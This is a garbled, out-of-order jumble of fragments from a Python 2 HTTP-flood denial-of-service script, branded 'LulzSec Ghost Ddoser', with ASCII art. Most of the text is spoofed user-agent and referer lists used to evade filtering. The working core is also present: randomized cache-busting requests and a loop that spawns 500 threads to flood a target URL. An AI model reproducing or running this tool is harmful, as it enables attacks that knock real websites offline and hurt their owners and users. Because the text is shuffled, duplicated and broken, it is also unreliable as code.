Build/HTK55D)') headers_useragents.append('Opera/9.80 (Android 3.2.1; Linux; Opera')", "1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone", "like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')", "headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler;", "Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta", "v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1", "prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0')", "headers_useragents.append('Argus/1.1 (Nutch; http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)')", "MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b')", "headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U;", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0", "headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider (http://www.adaxas.net/)') headers_useragents.append('Advanced Browser", "3.2.1; Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11;", "headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0", "China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9;", "(compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ;", "headers_useragents.append('AgentName/0.1 libwww-perl/5.48') headers_useragents.append('AIBOT/2.1 By +(www.21seek.com A Real artificial intelligence search engine China)') headers_useragents.append('AideRSS/1.0", "+(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0')", "N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U;", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19", "One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm')", "MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind V-1.x') headers_useragents.append('autoemailspider') headers_useragents.append('autohttp') headers_useragents.append('autowebdir 1.1 (www.autowebdir.com)') headers_useragents.append('AV Fetch 1.0')", "8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/4.0 (compatible;", "NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation", "7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0", "v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)')", "LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if url.count(\"/\")==2:", "eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers)", "/ ' | / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | :", "META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) -", "headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "(Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)')", "http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev", "(+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator", "Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)')", "e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap", "<EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>')", "headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha -", "caller thread class HTTPThread(threading.Thread): def run(self): try: while flag<2: code=httpcall(url) if (code==800) &", "X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup')", "+ '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) +", "return(out_str) def usage(): print 'Pra usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser", "keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G')", "Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3;", "\\ / / :_| ;`-._; __..--'; : : / ( ;|;-./_ _/.-:'o |", "| | | `| : `' ,' `. / |`-:_ ; | |", "| : \\ `--. ) /|-._: : | \\ \\ / / :_|", "admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1", "5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26", "http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler v.0.9.7c (http://domainsdb.net/)') headers_useragents.append('GSiteCrawler/v1.20 rev. 273 (http://gsitecrawler.com/)') headers_useragents.append('GSiteCrawler/v1.12 rev. 260 (http://gsitecrawler.com/)')", "Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko)", "headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)') headers_useragents.append('Balihoo/Nutch-1.0-dev (Crawler for Balihoo.com search engine - obeys", "Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus", "= m.group(1) for i in range(500): t = HTTPThread() t.start() t = MonitorThread()", "search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com;", "headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1 +(http://www.atlocal.com/local-web-site-owner.html)') headers_useragents.append('Atomic_Email_Hunter/4.0') headers_useragents.append('Atomz/1.0') headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev", "engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)')", "libwww/5.4.0') headers_useragents.append('amaya/11.2 amaya/5.4.0') headers_useragents.append('amaya/11.1 amaya/5.4.0') headers_useragents.append('Cocoal.icio.us/1.0 (v43) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40)", "for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)')", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5')", "headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows", "headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0", "(BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider.htm)') headers_useragents.append('Baiduspider+(+http://www.baidu.com/search/spider_jp.html)')", "headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') # generates", "referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=')", ";..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\", "(www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler", "headers_useragents.append('Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-us)') headers_useragents.append('AppleWebKit/533.16 (KHTML, like Gecko)", "dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)')", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux;", "U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE-", "(Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0", "X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X;", "ATTACK STARTRD<~~[+] ' code=500 except urllib2.URLError, e: #print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request)", "; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp (Nutch; http://www.nutch.org/docs/en/bot.html; nutch-agent@<EMAIL>)') headers_useragents.append('asked/Nutch-0.8 (web crawler; http://asked.jp; epicurus at", "U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation", "keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host", "_,' |;._:: | | | | `| : `' ,' `. / |`-:_", "+ buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive',", "CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0", "headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1 libwww-perl/5.48')", "<____|.----|| .---''---, The ;..__..' _... Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/", "U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile", "rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML,", "10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,", "keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air')", "accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot", "like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)')", "Android 4.1.2; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('amibot')", "(X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE", "<EMAIL>)') headers_useragents.append('amibot') headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3')", "U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows;", "like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181", "HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia", "headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara", "Ghost' print \"\\a\" print \\ \"\"\" . _____|\\ _.--| LOL |: <____|.----|| .---''---,", "sys.argv[1]==\"help\": usage() sys.exit() else: print \"Script Priv8 Privada da LulzSec Ghost\" if len(sys.argv)==", "code=0 if url.count(\"?\")>0: param_joiner=\"&\" else: param_joiner=\"?\" request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10))", "headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates", "keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le", "MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows;", "| / , \\._/_/_./--''/_|:|___|_,' | : / `'-'--'----'---------' | | : O ._O", "headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)')", "generates a Keyword list def keyword_list(): global keyword_top keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World", "headers_useragents.append('W3C_Validator/1.305.2.12 libwww-perl/5.64') headers_useragents.append('WDG_Validator/1.6.2') headers_useragents.append('amaya/11.3.1 libwww/5.4.1') headers_useragents.append('amaya/11.2 libwww/5.4.0') headers_useragents.append('amaya/11.1 libwww/5.4.0') headers_useragents.append('amaya/10.1 libwww/5.4.0') headers_useragents.append('amaya/10 libwww/5.4.0')", "(Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0;", "usar python Lulz.py <url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8", "headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166", "en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606') headers_useragents.append('W3C_Validator/1.591') headers_useragents.append('W3C_Validator/1.575')", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36", "your site for better indexing on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider;", ": | \\ \\ / / :_| ;`-._; __..--'; : : / (", "PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model", "6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('Mozilla/5.0 (Windows;", "Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML,", "3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append(' Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop", "Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19')", "V2.0B <EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi", "Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x", "(aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2')", "at gmail dot com)') headers_useragents.append('ASPSeek/1.2.5') headers_useragents.append('ASPseek/1.2.9d') headers_useragents.append('ASPSeek/1.2.x') headers_useragents.append('ASPSeek/1.2.xa') headers_useragents.append('ASPseek/1.2.xx') headers_useragents.append('ASPSeek/1.2.xxpre') headers_useragents.append('ASSORT/0.10') headers_useragents.append('asterias/2.0') headers_useragents.append('AtlocalBot/1.1", "headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31", "miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja", "<url>' print 'LulzSec Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec", "generates a user agent array def 